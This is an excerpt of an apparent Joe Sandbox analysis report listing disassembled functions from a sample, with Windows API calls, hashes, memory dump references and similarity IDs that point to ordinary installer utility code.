                                                                                                                                                                                                                                                                                                  • API String ID: 2993511968-1624333943
                                                                                                                                                                                                                                                                                                  • Opcode ID: e202a30c009f336556fcc323dde1006866ae786090e57e5f0545c26277c91176
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bd2720af669b00c29248f4e750560b83e1f7e70c9c86cdf56303f29334a2789
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e202a30c009f336556fcc323dde1006866ae786090e57e5f0545c26277c91176
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B118FB5200216EFDB199F64E885E6ABBF5FF49720B104168F9149B391C771AC10CBA4
                                                                                                                                                                                                                                                                                                  Function 00606067 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00605FD0,00000000,00000000,00000001), ref: 006060DF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00605FD0,00000000,00000000,00000001), ref: 00606130
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: 8jb$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-386354665
                                                                                                                                                                                                                                                                                                  • Opcode ID: bea63d98bc35d0f72029bfe3d55807d2f4590b0fd03a63ee4cf385b9f1b7397b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a3904d5fd96b23b7e160e9e391c4ffe24a9b27af87801dd9cc619e6c2988641
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bea63d98bc35d0f72029bfe3d55807d2f4590b0fd03a63ee4cf385b9f1b7397b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9231F5369C062AABC7324BD9CD48F9B7ABBAF40B60F124254FD00AB291D671CD1096E0
                                                                                                                                                                                                                                                                                                  Function 005F615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,005F1AEC,00000000,80004004,?,005F1DF0,00000000,80004004,00000000,00000000), ref: 005F6162
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 005F61CA
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 005F61D6
                                                                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 005F61DC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_abort
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 88804580-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: aab9394894c82fd624076a26158f0ecc29fa255aa9b4851f428855143f57e59a
                                                                                                                                                                                                                                                                                                  • Instruction ID: a4c3c706f4ea5124a973a248f4360d13dcf8288be649f8f2eb8d4f75aa00a8ec
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aab9394894c82fd624076a26158f0ecc29fa255aa9b4851f428855143f57e59a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F08136144E1A67C32236356C0EF3F1E5ABBC1771B251124FB5596196FF6C98028125
                                                                                                                                                                                                                                                                                                  Function 006010B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0060112B
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00601163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3660427363-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 69559df6a65a1ed802ae15f7bde9dea080cb4dabae6034eb31a916bb1d66c78d
                                                                                                                                                                                                                                                                                                  • Instruction ID: bc1c8433f6478b9f7a5c2662ad6f4d1be683b66ef1cf7b9b7205b14e92e69e4c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69559df6a65a1ed802ae15f7bde9dea080cb4dabae6034eb31a916bb1d66c78d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95419732D4012ABBDB289F94CC459EFBBBBFF45350F1045A9FA11AB291D7318D118B90
                                                                                                                                                                                                                                                                                                  Function 006031EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00603200
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00603230
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 298096c926d40238250e744d34265bb610c8dabd4343545026eaa15211c5c349
                                                                                                                                                                                                                                                                                                  • Instruction ID: f14368736c4008b187f7384fc05ba1449018ea6f87f305c5efa958fd6feeebfb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 298096c926d40238250e744d34265bb610c8dabd4343545026eaa15211c5c349
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F0B431182664A7C7310F84AC08FAB77AEAB80B61F258029FC0467350C7718F1196D0